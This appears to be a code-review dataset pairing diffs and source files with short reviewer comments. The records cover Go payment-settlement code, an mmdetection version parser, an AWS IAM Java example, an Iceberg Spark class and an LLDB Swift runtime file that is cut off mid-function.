paymentAmount.Set(big.NewInt(0)) } err = w.WriteMsgWithContext(ctx, &pb.PaymentAck{ Amount: paymentAmount.Bytes(), Timestamp: timestamp, }) if err != nil { return err } var lastTime lastPayment err = s.store.Get(totalKey(p.Address, SettlementReceivedPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return err } lastTime.Total = big.NewInt(0) } lastTime.Total = lastTime.Total.Add(lastTime.Total, paymentAmount) lastTime.Timestamp = timestamp err = s.store.Put(totalKey(p.Address, SettlementReceivedPrefix), lastTime) if err != nil { return err } receivedPaymentF64, _ := big.NewFloat(0).SetInt(paymentAmount).Float64() s.metrics.TotalReceivedPseudoSettlements.Add(receivedPaymentF64) s.metrics.ReceivedPseudoSettlements.Inc() return s.accounting.NotifyRefreshmentReceived(p.Address, paymentAmount) } // Pay initiates a payment to the given peer func (s *Service) Pay(ctx context.Context, peer swarm.Address, amount, checkAllowance *big.Int) (*big.Int, int64, error) { ctx, cancel := context.WithTimeout(ctx, 5*time.Second) defer cancel() var err error defer func() { if err != nil { s.metrics.ReceivedPseudoSettlementsErrors.Inc() } }() var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementSentPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, 0, err } lastTime.Total = big.NewInt(0) lastTime.Timestamp = 0 } currentTime := s.timeNow().Unix() if currentTime == lastTime.CheckTimestamp { return nil, 0, ErrSettlementTooSoon } stream, err := s.streamer.NewStream(ctx, peer, nil, protocolName, protocolVersion, streamName) if err != nil { return nil, 0, err } defer func() { if err != nil { _ = stream.Reset() } else { _ = stream.FullClose() } }() if checkAllowance.Cmp(amount) > 0 { checkAllowance.Set(amount) } s.logger.Tracef("pseudosettle sending payment message to peer %v of %d", peer, amount) w, r := protobuf.NewWriterAndReader(stream) err = w.WriteMsgWithContext(ctx, &pb.Payment{ Amount: amount.Bytes(), }) if err != nil { return nil, 0, err } checkTime := s.timeNow().Unix() var paymentAck pb.PaymentAck err = r.ReadMsgWithContext(ctx, &paymentAck) if err != nil { return nil, 0, err } acceptedAmount := new(big.Int).SetBytes(paymentAck.Amount) if acceptedAmount.Cmp(amount) > 0 { err = fmt.Errorf("pseudosettle peer %v accepted payment larger than expected", peer) return nil, 0, err } experiencedInterval := checkTime - lastTime.CheckTimestamp allegedInterval := paymentAck.Timestamp - lastTime.Timestamp if allegedInterval < 0 { return nil, 0, ErrTimeOutOfSync } experienceDifferenceRecent := paymentAck.Timestamp - checkTime if experienceDifferenceRecent < -2 || experienceDifferenceRecent > 2 { return nil, 0, ErrTimeOutOfSync } experienceDifferenceInterval := experiencedInterval - allegedInterval if experienceDifferenceInterval < -3 || experienceDifferenceInterval > 3 { return nil, 0, ErrTimeOutOfSync } // enforce allowance // check if value is appropriate expectedAllowance := new(big.Int).Mul(big.NewInt(allegedInterval), s.refreshRate) if expectedAllowance.Cmp(checkAllowance) > 0 { expectedAllowance = new(big.Int).Set(checkAllowance) } if expectedAllowance.Cmp(acceptedAmount) > 0 { // disconnect peer err = fmt.Errorf("pseudosettle peer %v accepted lower payment than expected", peer) return nil, 0, err } lastTime.Total = lastTime.Total.Add(lastTime.Total, acceptedAmount) lastTime.Timestamp = paymentAck.Timestamp lastTime.CheckTimestamp = checkTime err = s.store.Put(totalKey(peer, SettlementSentPrefix), lastTime) if err != nil { return nil, 0, err } amountFloat, _ := new(big.Float).SetInt(acceptedAmount).Float64() s.metrics.TotalSentPseudoSettlements.Add(amountFloat) s.metrics.SentPseudoSettlements.Inc() return acceptedAmount, lastTime.CheckTimestamp, nil } func (s *Service) SetAccounting(accounting settlement.Accounting) { s.accounting = accounting } // TotalSent returns the total amount sent to a peer func (s *Service) TotalSent(peer swarm.Address) (totalSent *big.Int, err error) { var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementSentPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, settlement.ErrPeerNoSettlements } lastTime.Total = big.NewInt(0) } return lastTime.Total, nil } // TotalReceived returns the total amount received from a peer func (s *Service) TotalReceived(peer swarm.Address) (totalReceived *big.Int, err error) { var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementReceivedPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, settlement.ErrPeerNoSettlements } lastTime.Total = big.NewInt(0) } return lastTime.Total, nil } // SettlementsSent returns all stored sent settlement values for a given type of prefix func (s *Service) SettlementsSent() (map[string]*big.Int, error) { sent := make(map[string]*big.Int) err := s.store.Iterate(SettlementSentPrefix, func(key, val []byte) (stop bool, err error) { addr, err := totalKeyPeer(key, SettlementSentPrefix) if err != nil { return false, fmt.Errorf("parse address from key: %s: %w", string(key), err) } if _, ok := sent[addr.String()]; !ok { var storevalue lastPayment err = s.store.Get(totalKey(addr, SettlementSentPrefix), &storevalue) if err != nil { return false, fmt.Errorf("get peer %s settlement balance: %w", addr.String(), err) } sent[addr.String()] = storevalue.Total } return false, nil }) if err != nil { return nil, err } return sent, nil } // SettlementsReceived returns all stored received settlement values for a given type of prefix func (s *Service) SettlementsReceived() (map[string]*big.Int, error) { received := make(map[string]*big.Int) err := s.store.Iterate(SettlementReceivedPrefix, func(key, val []byte) (stop bool, err error) { addr, err := totalKeyPeer(key, SettlementReceivedPrefix) if err != nil { return false, fmt.Errorf("parse address from key: %s: %w", string(key), err) } if _, ok := received[addr.String()]; !ok { var storevalue lastPayment err = s.store.Get(totalKey(addr, SettlementReceivedPrefix), &storevalue) if err != nil { return false, fmt.Errorf("get peer %s settlement balance: %w", addr.String(), err) } received[addr.String()] = storevalue.Total } return false, nil }) if err != nil { return nil, err } return received, nil }
1
15,937
I know that previously this check was here but @ralph-pichler replaced it with the `CheckTimestamp` field stating that checking against `Timestamp` was incorrect. @ralph-pichler can you elaborate?
ethersphere-bee
go
@@ -0,0 +1,19 @@ +# Copyright (c) Open-MMLab. All rights reserved. + +__version__ = '2.3.0rc0' +short_version = '2.3.0rc0' + + +def parse_version_info(version_str): + version_info = [] + for x in version_str.split('.'): + if x.isdigit(): + version_info.append(int(x)) + elif x.find('rc') != -1: + patch_version = x.split('rc') + version_info.append(int(patch_version[0])) + version_info.append(f'rc{patch_version[1]}') + return tuple(version_info) + + +version_info = parse_version_info(__version__)
1
1
20,926
`short_version = __version__`
open-mmlab-mmdetection
py
@@ -1,4 +1,4 @@ -//snippet-sourcedescription:[UpdateAccessKey.java demonstrates how to update the status of an access key for an AWS Identity and Access Management (IAM) user.] +//snippet-sourcedescription:[UpdateAccessKey.java demonstrates how to update the status of an access key for an AWS Identity and Access Management (AWS IAM) user.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM]
1
//snippet-sourcedescription:[UpdateAccessKey.java demonstrates how to update the status of an access key for an AWS Identity and Access Management (IAM) user.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM] //snippet-sourcetype:[full-example] //snippet-sourcedate:[11/02/2020] //snippet-sourceauthor:[scmacdon-aws] /* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 */ package com.example.iam; // snippet-start:[iam.java2.update_access_key.import] import software.amazon.awssdk.services.iam.model.IamException; import software.amazon.awssdk.services.iam.model.StatusType; import software.amazon.awssdk.services.iam.model.UpdateAccessKeyRequest; import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.iam.IamClient; // snippet-end:[iam.java2.update_access_key.import] public class UpdateAccessKey { private static StatusType statusType; public static void main(String[] args) { final String USAGE = "\n" + "Usage:\n" + " UpdateAccessKey <username> <accessId> <status> \n\n" + "Where:\n" + " username - the name of the user whose key you want to update. \n\n" + " accessId - the access key ID of the secret access key you want to update. \n\n" + " status - the status you want to assign to the secret access key. \n\n" ; if (args.length != 3) { System.out.println(USAGE); System.exit(1); } // Read the command line arguments String username = args[0]; String accessId = args[1]; String status = args[2]; Region region = Region.AWS_GLOBAL; IamClient iam = IamClient.builder() .region(region) .build(); updateKey(iam, username, accessId, status); System.out.println("Done"); iam.close(); } // snippet-start:[iam.java2.update_access_key.main] public static void updateKey(IamClient iam, String username, String accessId, String status ) { try { if (status.toLowerCase().equalsIgnoreCase("active")) { statusType = StatusType.ACTIVE; } else if (status.toLowerCase().equalsIgnoreCase("inactive")) { statusType = StatusType.INACTIVE; } else { statusType = StatusType.UNKNOWN_TO_SDK_VERSION; } UpdateAccessKeyRequest request = UpdateAccessKeyRequest.builder() .accessKeyId(accessId) .userName(username) .status(statusType) .build(); iam.updateAccessKey(request); System.out.printf( "Successfully updated the status of access key %s to" + "status %s for user %s", accessId, status, username); } catch (IamException e) { System.err.println(e.awsErrorDetails().errorMessage()); System.exit(1); } } // snippet-end:[iam.java2.update_access_key.main] }
1
18,251
AWS Identity and Access Management (IAM)
awsdocs-aws-doc-sdk-examples
rb
@@ -19,11 +19,12 @@ package org.apache.iceberg.spark; +import java.io.Serializable; import org.apache.iceberg.StructLike; import org.apache.iceberg.types.Types; import org.apache.spark.sql.Row; -public class SparkStructLike implements StructLike { +public class SparkStructLike implements StructLike, Serializable { private final Types.StructType type; private Row wrapped;
1
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iceberg.spark; import org.apache.iceberg.StructLike; import org.apache.iceberg.types.Types; import org.apache.spark.sql.Row; public class SparkStructLike implements StructLike { private final Types.StructType type; private Row wrapped; public SparkStructLike(Types.StructType type) { this.type = type; } public SparkStructLike wrap(Row row) { this.wrapped = row; return this; } @Override public int size() { return type.fields().size(); } @Override public <T> T get(int pos, Class<T> javaClass) { Types.NestedField field = type.fields().get(pos); return javaClass.cast(SparkValueConverter.convert(field.type(), wrapped.get(pos))); } @Override public <T> void set(int pos, T value) { throw new UnsupportedOperationException("Not implemented: set"); } }
1
24,168
Required for the SparkDataFile SerDe
apache-iceberg
java
@@ -2595,16 +2595,8 @@ bool SwiftLanguageRuntime::CouldHaveDynamicValue(ValueObject &in_value) { // Swift class instances are actually pointers, but base class instances // are inlined at offset 0 in the class data. If we just let base classes // be dynamic, it would cause an infinite recursion. So we would usually - // disable it - // But if the base class is a generic type we still need to bind it, and - // that is - // a good job for dynamic types to perform - if (in_value.IsBaseClass()) { - CompilerType base_type(in_value.GetCompilerType()); - if (SwiftASTContext::IsFullyRealized(base_type)) - return false; - } - return true; + // disable it. + return !in_value.IsBaseClass(); } return var_type.IsPossibleDynamicType(nullptr, false, false, true); }
1
//===-- SwiftLanguageRuntime.cpp --------------------------------*- C++ -*-===// // // This source file is part of the Swift.org open source project // // Copyright (c) 2014 - 2018 Apple Inc. and the Swift project authors // Licensed under Apache License v2.0 with Runtime Library Exception // // See https://swift.org/LICENSE.txt for license information // See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors // //===----------------------------------------------------------------------===// #include "lldb/Target/SwiftLanguageRuntime.h" #include <string.h> #include "llvm/Support/raw_ostream.h" #include "clang/AST/ASTContext.h" #include "clang/AST/DeclCXX.h" #include "swift/ABI/System.h" #include "swift/AST/ASTContext.h" #include "swift/AST/ASTMangler.h" #include "swift/AST/Decl.h" #include "swift/AST/ExistentialLayout.h" #include "swift/AST/Module.h" #include "swift/AST/Types.h" #include "swift/AST/ASTWalker.h" #include "swift/Basic/SourceLoc.h" #include "swift/Demangling/Demangle.h" #include "swift/Demangling/Demangler.h" #include "swift/Reflection/ReflectionContext.h" #include "swift/Reflection/TypeRefBuilder.h" #include "swift/Remote/MemoryReader.h" #include "swift/Remote/RemoteAddress.h" #include "swift/RemoteAST/RemoteAST.h" #include "swift/Runtime/Metadata.h" #include "lldb/Breakpoint/StoppointCallbackContext.h" #include "lldb/Core/Debugger.h" #include "lldb/Core/Mangled.h" #include "lldb/Core/Module.h" #include "lldb/Core/PluginManager.h" #include "lldb/Core/Section.h" #include "lldb/Core/UniqueCStringMap.h" #include "lldb/Core/Value.h" #include "lldb/Core/ValueObjectConstResult.h" #include "lldb/DataFormatters/StringPrinter.h" #include "lldb/DataFormatters/TypeSynthetic.h" #include "lldb/DataFormatters/ValueObjectPrinter.h" #include "lldb/Host/HostInfo.h" #include "lldb/Host/OptionParser.h" #include "lldb/Interpreter/CommandInterpreter.h" #include "lldb/Interpreter/CommandObject.h" #include "lldb/Interpreter/CommandObjectMultiword.h" #include "lldb/Interpreter/CommandReturnObject.h" #include "lldb/Interpreter/OptionValueBoolean.h" #include "lldb/Symbol/ClangASTContext.h" #include "lldb/Symbol/CompileUnit.h" #include "lldb/Symbol/ObjectFile.h" #include "lldb/Symbol/SwiftASTContext.h" #include "lldb/Symbol/Symbol.h" #include "lldb/Symbol/TypeList.h" #include "lldb/Symbol/VariableList.h" #include "lldb/Target/ExecutionContext.h" #include "lldb/Target/ProcessStructReader.h" #include "lldb/Target/RegisterContext.h" #include "lldb/Target/StackFrame.h" #include "lldb/Target/Target.h" #include "lldb/Target/ThreadPlanRunToAddress.h" #include "lldb/Target/ThreadPlanStepInRange.h" #include "lldb/Target/ThreadPlanStepOverRange.h" #include "lldb/Utility/Status.h" #include "lldb/Utility/CleanUp.h" #include "lldb/Utility/DataBuffer.h" #include "lldb/Utility/LLDBAssert.h" #include "lldb/Utility/Log.h" #include "lldb/Utility/StringLexer.h" // FIXME: we should not need this #include "Plugins/Language/Swift/SwiftFormatters.h" using namespace lldb; using namespace lldb_private; char SwiftLanguageRuntime::ID = 0; static constexpr std::chrono::seconds g_po_function_timeout(15); static const char *g_dollar_tau_underscore = u8"$\u03C4_"; static ConstString g_self = ConstString("self"); extern "C" unsigned long long _swift_classIsSwiftMask = 0; namespace lldb_private { swift::Type GetSwiftType(void *opaque_ptr) { return reinterpret_cast<swift::TypeBase *>(opaque_ptr); } swift::CanType GetCanonicalSwiftType(void *opaque_ptr) { return reinterpret_cast<swift::TypeBase *>(opaque_ptr)->getCanonicalType(); } swift::CanType GetCanonicalSwiftType(const CompilerType &type) { return GetCanonicalSwiftType( reinterpret_cast<void *>(type.GetOpaqueQualType())); } swift::Type GetSwiftType(const CompilerType &type) { return GetSwiftType(reinterpret_cast<void *>(type.GetOpaqueQualType())); } } // namespace lldb_private SwiftLanguageRuntime::~SwiftLanguageRuntime() = default; static bool HasReflectionInfo(ObjectFile *obj_file) { auto findSectionInObject = [&](std::string name) { ConstString section_name(name); SectionSP section_sp = obj_file->GetSectionList()->FindSectionByName(section_name); if (section_sp) return true; return false; }; bool hasReflectionSection = false; hasReflectionSection |= findSectionInObject("__swift5_fieldmd"); hasReflectionSection |= findSectionInObject("__swift5_assocty"); hasReflectionSection |= findSectionInObject("__swift5_builtin"); hasReflectionSection |= findSectionInObject("__swift5_capture"); hasReflectionSection |= findSectionInObject("__swift5_typeref"); hasReflectionSection |= findSectionInObject("__swift5_reflstr"); return hasReflectionSection; } void SwiftLanguageRuntime::SetupReflection() { reflection_ctx.reset(new NativeReflectionContext(this->GetMemoryReader())); auto &target = m_process->GetTarget(); auto M = target.GetExecutableModule(); if (!M) return; auto *obj_file = M->GetObjectFile(); if (!obj_file) return; if (obj_file->GetPluginName().GetStringRef().equals("elf")) return; Address start_address = obj_file->GetBaseAddress(); auto load_ptr = static_cast<uintptr_t>(start_address.GetLoadAddress(&target)); // Bail out if we can't read the executable instead of crashing. if (load_ptr == 0 || load_ptr == LLDB_INVALID_ADDRESS) return; reflection_ctx.reset(new NativeReflectionContext(this->GetMemoryReader())); reflection_ctx->addImage(swift::remote::RemoteAddress(load_ptr)); auto module_list = GetTargetRef().GetImages(); module_list.ForEach([&](const ModuleSP &module_sp) -> bool { auto *obj_file = module_sp->GetObjectFile(); if (!obj_file) return false; if (obj_file->GetPluginName().GetStringRef().equals("elf")) return true; Address start_address = obj_file->GetBaseAddress(); auto load_ptr = static_cast<uintptr_t>( start_address.GetLoadAddress(&(m_process->GetTarget()))); if (load_ptr == 0 || load_ptr == LLDB_INVALID_ADDRESS) return false; if (HasReflectionInfo(obj_file)) reflection_ctx->addImage(swift::remote::RemoteAddress(load_ptr)); return true; }); } SwiftLanguageRuntime::SwiftLanguageRuntime(Process *process) : LanguageRuntime(process) { SetupSwiftError(); SetupExclusivity(); SetupReflection(); SetupABIBit(); } bool SwiftLanguageRuntime::IsABIStable() { return _swift_classIsSwiftMask == 2; } static llvm::Optional<lldb::addr_t> FindSymbolForSwiftObject(Target &target, ConstString object, const SymbolType sym_type) { llvm::Optional<lldb::addr_t> retval; SymbolContextList sc_list; if (target.GetImages().FindSymbolsWithNameAndType(object, sym_type, sc_list)) { SymbolContext SwiftObject_Class; if (sc_list.GetSize() == 1 && sc_list.GetContextAtIndex(0, SwiftObject_Class)) { if (SwiftObject_Class.symbol) { lldb::addr_t SwiftObject_class_addr = SwiftObject_Class.symbol->GetAddress().GetLoadAddress(&target); if (SwiftObject_class_addr && SwiftObject_class_addr != LLDB_INVALID_ADDRESS) retval = SwiftObject_class_addr; } } } return retval; } AppleObjCRuntimeV2 *SwiftLanguageRuntime::GetObjCRuntime() { if (auto objc_runtime = ObjCLanguageRuntime::Get(*GetProcess())) { if (objc_runtime->GetPluginName() == AppleObjCRuntimeV2::GetPluginNameStatic()) return (AppleObjCRuntimeV2 *)objc_runtime; } return nullptr; } void SwiftLanguageRuntime::SetupSwiftError() { Target &target(m_process->GetTarget()); if (m_SwiftNativeNSErrorISA.hasValue()) return; ConstString g_SwiftNativeNSError("__SwiftNativeNSError"); m_SwiftNativeNSErrorISA = FindSymbolForSwiftObject( target, g_SwiftNativeNSError, eSymbolTypeObjCClass); } void SwiftLanguageRuntime::SetupExclusivity() { Target &target(m_process->GetTarget()); ConstString g_disableExclusivityChecking("_swift_disableExclusivityChecking"); m_dynamic_exclusivity_flag_addr = FindSymbolForSwiftObject( target, g_disableExclusivityChecking, eSymbolTypeData); Log *log(GetLogIfAnyCategoriesSet(LIBLLDB_LOG_EXPRESSIONS)); if (log) log->Printf("SwiftLanguageRuntime: _swift_disableExclusivityChecking = %lu", m_dynamic_exclusivity_flag_addr ? *m_dynamic_exclusivity_flag_addr : 0); } void SwiftLanguageRuntime::SetupABIBit() { Target &target(m_process->GetTarget()); ConstString g_objc_debug_swift_stable_abi_bit("objc_debug_swift_stable_abi_bit"); if (FindSymbolForSwiftObject(target, g_objc_debug_swift_stable_abi_bit, eSymbolTypeAny)) _swift_classIsSwiftMask = 2; else _swift_classIsSwiftMask = 1; } void SwiftLanguageRuntime::ModulesDidLoad(const ModuleList &module_list) { module_list.ForEach([&](const ModuleSP &module_sp) -> bool { auto *obj_file = module_sp->GetObjectFile(); if (!obj_file) return true; Address start_address = obj_file->GetBaseAddress(); auto load_ptr = static_cast<uintptr_t>( start_address.GetLoadAddress(&(m_process->GetTarget()))); if (load_ptr == 0 || load_ptr == LLDB_INVALID_ADDRESS) return false; if (!reflection_ctx) return false; if (HasReflectionInfo(obj_file)) reflection_ctx->addImage(swift::remote::RemoteAddress(load_ptr)); return true; }); } static bool GetObjectDescription_ResultVariable(Process *process, Stream &str, ValueObject &object) { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_DATAFORMATTERS)); StreamString expr_string; expr_string.Printf("Swift._DebuggerSupport.stringForPrintObject(%s)", object.GetName().GetCString()); if (log) log->Printf("[GetObjectDescription_ResultVariable] expression: %s", expr_string.GetData()); ValueObjectSP result_sp; EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); eval_options.SetGenerateDebugInfo(true); eval_options.SetTimeout(g_po_function_timeout); auto eval_result = process->GetTarget().EvaluateExpression( expr_string.GetData(), process->GetThreadList().GetSelectedThread()->GetSelectedFrame().get(), result_sp, eval_options); if (log) { switch (eval_result) { case eExpressionCompleted: log->Printf("[GetObjectDescription_ResultVariable] eExpressionCompleted"); break; case eExpressionSetupError: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionSetupError"); break; case eExpressionParseError: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionParseError"); break; case eExpressionDiscarded: log->Printf("[GetObjectDescription_ResultVariable] eExpressionDiscarded"); break; case eExpressionInterrupted: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionInterrupted"); break; case eExpressionHitBreakpoint: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionHitBreakpoint"); break; case eExpressionTimedOut: log->Printf("[GetObjectDescription_ResultVariable] eExpressionTimedOut"); break; case eExpressionResultUnavailable: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionResultUnavailable"); break; case eExpressionStoppedForDebug: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionStoppedForDebug"); break; } } // sanitize the result of the expression before moving forward if (!result_sp) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "no result"); return false; } if (result_sp->GetError().Fail()) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "error: %s", result_sp->GetError().AsCString()); return false; } if (false == result_sp->GetCompilerType().IsValid()) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "invalid type"); return false; } lldb_private::formatters::StringPrinter::ReadStringAndDumpToStreamOptions dump_options; dump_options.SetEscapeNonPrintables(false).SetQuote('\0').SetPrefixToken( nullptr); if (lldb_private::formatters::swift::String_SummaryProvider( *result_sp.get(), str, TypeSummaryOptions() .SetLanguage(lldb::eLanguageTypeSwift) .SetCapping(eTypeSummaryUncapped), dump_options)) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression completed " "successfully"); return true; } else { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "invalid string data"); return false; } } static bool GetObjectDescription_ObjectReference(Process *process, Stream &str, ValueObject &object) { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_DATAFORMATTERS)); StreamString expr_string; expr_string.Printf("Swift._DebuggerSupport.stringForPrintObject(Swift." "unsafeBitCast(0x%" PRIx64 ", to: AnyObject.self))", object.GetValueAsUnsigned(0)); if (log) log->Printf("[GetObjectDescription_ObjectReference] expression: %s", expr_string.GetData()); ValueObjectSP result_sp; EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); eval_options.SetGenerateDebugInfo(true); eval_options.SetTimeout(g_po_function_timeout); auto eval_result = process->GetTarget().EvaluateExpression( expr_string.GetData(), process->GetThreadList().GetSelectedThread()->GetSelectedFrame().get(), result_sp, eval_options); if (log) { switch (eval_result) { case eExpressionCompleted: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionCompleted"); break; case eExpressionSetupError: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionSetupError"); break; case eExpressionParseError: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionParseError"); break; case eExpressionDiscarded: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionDiscarded"); break; case eExpressionInterrupted: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionInterrupted"); break; case eExpressionHitBreakpoint: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionHitBreakpoint"); break; case eExpressionTimedOut: log->Printf("[GetObjectDescription_ObjectReference] eExpressionTimedOut"); break; case eExpressionResultUnavailable: log->Printf("[GetObjectDescription_ObjectReference] " "eExpressionResultUnavailable"); break; case eExpressionStoppedForDebug: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionStoppedForDebug"); break; } } // sanitize the result of the expression before moving forward if (!result_sp) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression generated " "no result"); return false; } if (result_sp->GetError().Fail()) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression generated " "error: %s", result_sp->GetError().AsCString()); return false; } if (false == result_sp->GetCompilerType().IsValid()) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression generated " "invalid type"); return false; } lldb_private::formatters::StringPrinter::ReadStringAndDumpToStreamOptions dump_options; dump_options.SetEscapeNonPrintables(false).SetQuote('\0').SetPrefixToken( nullptr); if (lldb_private::formatters::swift::String_SummaryProvider( *result_sp.get(), str, TypeSummaryOptions() .SetLanguage(lldb::eLanguageTypeSwift) .SetCapping(eTypeSummaryUncapped), dump_options)) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression completed " "successfully"); return true; } else { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression generated " "invalid string data"); return false; } } static const ExecutionContextRef *GetSwiftExeCtx(ValueObject &valobj) { return (valobj.GetPreferredDisplayLanguage() == eLanguageTypeSwift) ? &valobj.GetExecutionContextRef() : nullptr; } static bool GetObjectDescription_ObjectCopy(SwiftLanguageRuntime *runtime, Process *process, Stream &str, ValueObject &object) { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_DATAFORMATTERS)); ValueObjectSP static_sp(object.GetStaticValue()); CompilerType static_type(static_sp->GetCompilerType()); if (auto non_reference_type = static_type.GetNonReferenceType()) static_type = non_reference_type; Status error; // If we are in a generic context, here the static type of the object // might end up being generic (i.e. <T>). We want to make sure that // we correctly map the type into context before asking questions or // printing, as IRGen requires a fully realized type to work on. auto frame_sp = process->GetThreadList().GetSelectedThread()->GetSelectedFrame(); auto *swift_ast_ctx = llvm::dyn_cast_or_null<SwiftASTContext>(static_type.GetTypeSystem()); if (swift_ast_ctx) { SwiftASTContextLock lock(GetSwiftExeCtx(object)); static_type = runtime->DoArchetypeBindingForType(*frame_sp, static_type); } auto stride = 0; auto opt_stride = static_type.GetByteStride(frame_sp.get()); if (opt_stride) stride = *opt_stride; lldb::addr_t copy_location = process->AllocateMemory( stride, ePermissionsReadable | ePermissionsWritable, error); if (copy_location == LLDB_INVALID_ADDRESS) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] copy_location invalid"); return false; } CleanUp cleanup( [process, copy_location] { process->DeallocateMemory(copy_location); }); DataExtractor data_extractor; if (0 == static_sp->GetData(data_extractor, error)) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] data extraction failed"); return false; } if (0 == process->WriteMemory(copy_location, data_extractor.GetDataStart(), data_extractor.GetByteSize(), error)) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] memory copy failed"); return false; } StreamString expr_string; expr_string.Printf("Swift._DebuggerSupport.stringForPrintObject(Swift." "UnsafePointer<%s>(bitPattern: 0x%" PRIx64 ")!.pointee)", static_type.GetTypeName().GetCString(), copy_location); if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression: %s", expr_string.GetData()); ValueObjectSP result_sp; EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); eval_options.SetGenerateDebugInfo(true); eval_options.SetTimeout(g_po_function_timeout); auto eval_result = process->GetTarget().EvaluateExpression( expr_string.GetData(), process->GetThreadList().GetSelectedThread()->GetSelectedFrame().get(), result_sp, eval_options); if (log) { switch (eval_result) { case eExpressionCompleted: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionCompleted"); break; case eExpressionSetupError: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionSetupError"); break; case eExpressionParseError: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionParseError"); break; case eExpressionDiscarded: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionDiscarded"); break; case eExpressionInterrupted: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionInterrupted"); break; case eExpressionHitBreakpoint: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionHitBreakpoint"); break; case eExpressionTimedOut: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionTimedOut"); break; case eExpressionResultUnavailable: log->Printf( "[GetObjectDescription_ObjectCopy] eExpressionResultUnavailable"); break; case eExpressionStoppedForDebug: log->Printf( "[GetObjectDescription_ObjectCopy] eExpressionStoppedForDebug"); break; } } // sanitize the result of the expression before moving forward if (!result_sp) { if (log) log->Printf( "[GetObjectDescription_ObjectCopy] expression generated no result"); str.Printf("expression produced no result"); return true; } if (result_sp->GetError().Fail()) { if (log) log->Printf( "[GetObjectDescription_ObjectCopy] expression generated error: %s", result_sp->GetError().AsCString()); str.Printf("expression produced error: %s", result_sp->GetError().AsCString()); return true; } if (false == result_sp->GetCompilerType().IsValid()) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression generated " "invalid type"); str.Printf("expression produced invalid result type"); return true; } lldb_private::formatters::StringPrinter::ReadStringAndDumpToStreamOptions dump_options; dump_options.SetEscapeNonPrintables(false).SetQuote('\0').SetPrefixToken( nullptr); if (lldb_private::formatters::swift::String_SummaryProvider( *result_sp.get(), str, TypeSummaryOptions() .SetLanguage(lldb::eLanguageTypeSwift) .SetCapping(eTypeSummaryUncapped), dump_options)) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression completed " "successfully"); } else { if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression generated " "invalid string data"); str.Printf("expression produced unprintable string"); } return true; } static bool IsSwiftResultVariable(ConstString name) { if (name) { llvm::StringRef name_sr(name.GetStringRef()); if (name_sr.size() > 2 && (name_sr.startswith("$R") || name_sr.startswith("$E")) && ::isdigit(name_sr[2])) return true; } return false; } static bool IsSwiftReferenceType(ValueObject &object) { CompilerType object_type(object.GetCompilerType()); if (llvm::dyn_cast_or_null<SwiftASTContext>(object_type.GetTypeSystem())) { Flags type_flags(object_type.GetTypeInfo()); if (type_flags.AllSet(eTypeIsClass | eTypeHasValue | 